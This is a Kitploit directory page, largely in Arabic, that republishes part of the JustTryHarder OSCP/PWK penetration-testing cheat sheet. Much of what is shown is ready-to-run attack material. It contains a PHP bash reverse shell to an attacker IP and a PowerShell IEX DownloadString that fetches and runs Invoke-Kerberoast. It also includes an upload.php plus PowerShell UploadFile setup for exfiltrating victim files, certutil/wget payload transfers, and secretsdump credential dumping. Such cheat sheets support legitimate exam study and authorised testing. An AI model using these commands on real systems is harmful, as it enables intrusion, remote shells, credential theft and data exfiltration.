Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
JustTryHarder — ورقة غش شاملة لاختبار الاختراق لتحضير امتحان PWK/OSCP، تغطي تصعيد الامتيازات، كسر كلمات المرور، توليد الحمولات، ما بعد الاستغلال، فحص المنافذ، الهجمات على الويب، وتقنيات الاستطلاع. | Kitploit
أدوات/GitHubGitHub/sinfulz/justtryharder
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعتوليد الحمولةمسح المنافذالاستغلالما بعد الاستغلالأمن الويباختبار الاختراقالتعلم والتعليم
GitHubsinfulz/justtryharder
836106161منذ 2 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

JustTryHarder

ورقة غش شاملة لاختبار الاختراق لتحضير امتحان PWK/OSCP، تغطي تصعيد الامتيازات، كسر كلمات المرور، توليد الحمولات، ما بعد الاستغلال، فحص المنافذ، الهجمات على الويب، وتقنيات الاستطلاع.

عرض المستودع

JustTryHarder

JustTryHarder هو مرجع سريع سيساعدك خلال دورة PWK وامتحان OSCP.

(مستوحى من PayloadAllTheThings)

لا تتردد في تقديم Pull Request وترك نجمة لمشاركة الحب إذا ساعدك هذا. 💖

صديق لـ Hacktoberfest! نعم، نحن منفتحون لطلبات Pull Requests لـ Hacktoberfest! يرجى التأكد من أنها ليست بريدًا عشوائيًا وتساهم فعليًا بشكل جيد في هذا المستودع. شكرًا واستمتع بالاختراق!

إخلاء مسؤولية: لا شيء مما يلي يحتوي على حرق لمختبرات PWK / امتحان OSCP.

معلومات الإسناد

لقد حصلت على الكثير من هذه المعلومات من خلال مستودعات Github الأخرى والمدونات والمواقع والمزيد. لقد حاولت تقديم أكبر قدر من الإسناد إلى المنشئ الأصلي بقدر الإمكان. إذا لم أقدم لك الإسناد، فيرجى الاتصال بي على Twitter: https://twitter.com/s1nfulz

Table of Contents

  • Determining the OS of a host via Ping
  • BOF (WIP)
  • Breakouts / Environment Escapes
  • DNS - Zone Transfers
  • File Transfers
  • Kerberoasting
  • LFI / RFI
  • MSSQL / SQLi
  • Password Cracking
  • Password Spraying (CrackMapExec)
  • Payload Generation
  • PHP
  • Priv Esc - Linux
  • Priv Esc - Windows
  • Post Exploitation
  • Port Forwarding
  • Socks Proxy (using PowerShell)
  • Port Scanning
  • Ping Sweep
  • Pivoting
  • Remote Desktop
  • Responder
  • Reverse Shells
  • Shell Upgrading
  • SQL Injection (SQLmap)
  • Show listening ports
  • SMB - Enumeration
  • SMB - Impacket
  • SMTP Enumeration
  • ICMP Injection
  • VMware (not going full screen)
  • Web Servers
  • Web Scanning
  • Web Shells
  • WordPress
  • Windows Framework / Powershell
  • Windows Post Exploitation Commands
  • Writeable Directories
  • Todo List
  • Thank you

Determining the OS of a host via Ping```bash

ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms

يمكن استخدام `TTL` لتحديد نظام تشغيل المضيف. الأنواع الثلاثة المختلفة من TTL موضحة أدناه:

  - **TTL=64** = \*nix - عدد القفزات؛ لذا إذا كنت تحصل على 61، فهناك 3 قفزات وهو جهاز \*nix. على الأرجح Linux.
  - **TTL=128** = Windows - مرة أخرى، إذا كان TTL هو 127 فإن القفزة هي 1 وهو جهاز Windows.
  - **TTL=254** = Solaris/AIX - إذا كان TTL هو 250 فإن عدد القفزات هو 4 وهو جهاز Solaris.

## BOF (قيد التطوير)

(الأحرف السيئة النموذجية تشمل: `0x00`, `0x0A`, `0x0D`)

  - Fuzzing
  - إيجاد موضع EIP
  - إيجاد الأحرف السيئة
  - تحديد موقع `jmp esp`
  - إنشاء الحمولة باستخدام `msfvenom`
  - الحصول على شل عكسي باستخدام `netcat`

**موارد جيدة حول BOF:**

  - [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
  - [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
  - [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
  - [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)

## عمليات الهروب / الهروب من البيئات

  - [Pentest Partners - Breaking out of Citrix](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
  - [SRA.io - SiteKiosk Breakout](https://sra.io/blog/sitekiosk-breakout/)
  - [TrustedSec - Kiosk/POS Breakout Keys](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
  - [Cognosec - Breaking out of Citrix Environment](https://cognosec.com/breaking-out-of-citrix-environment/)
  - [NetSPI - Breaking out of Applications](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
  - [NCC Group - Common Issues with Environment Breakouts (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
  - [GracefulSecurity - Citrix Breakout](https://gracefulsecurity.com/citrix-breakout/)

## DNS - نقل المناطق```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## نقل الملفات

### نقل SMB

على جهاز الضحية (Windows):```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget نقل

كيفية استرداد ملف (ملفات) من المضيف (داخل شل عكسية).

**الإعداد:** ضع الملف الذي تريد نقله في `/var/www/html/` وشغل `service apache2 start`.

شغل على الخادم البعيد:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64)       # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/)   # <- for folder
```
### نقل TFTP

(كيفية النقل من Kali إلى Windows).

**باستخدام MSF:**
قم بتشغيل MSF قبل هذه الخطوات:

1.  `use auxiliary/server/tftp`
2.  `set TFTPROOT /usr/share/mimikatz/Win32/`
3.  `run`

**داخل الطرفية:**
4.  `tftp -i 10.10.10.10 GET mimikatz.exe`

### NetCat (من Windows إلى Kali)

1.  **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2.  **Linux:** `nc -nlvp 4444 > bank-account.zip`

### PowerShell

جلسة تفاعلية:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
بدون جلسة باورشيل تفاعلية (أنشئ `wget.ps1`):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (لينكس -> لينكس)

**المضيف المحلي:**

1.  `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2.  انقل `encoded.b64` إلى الخادم البعيد باستخدام `nc` أو بطريقة أخرى.

**الخادم البعيد - لينكس:**
3. `cat /path/to/encoded.b64 | base64 -d > exploit.py`

### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### رفع الملفات عبر HTTP (تسريب)

**1. إنشاء upload.php**
إنشاء في جذر الويب للجهاز المهاجم (`/var/www/html` افتراضيًا).```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. إنشاء الدليل**
أنشئ دليل الرفع واضبط الأذونات المناسبة للسماح بالرفع.```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. رفع ملف**
رفع ملف من الجهاز الضحية إلى الجهاز المهاجم باستخدام PowerShell:```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting

  - `GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>`
  - `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
  - `impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes`

## LFI / RFI

**PHP Reverse Shell:**```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
```
**حقن الأوامر:**```php
<?php echo shell_exec(whoami);?>
```
## MSSQL / SQLi
تنزيل الأداة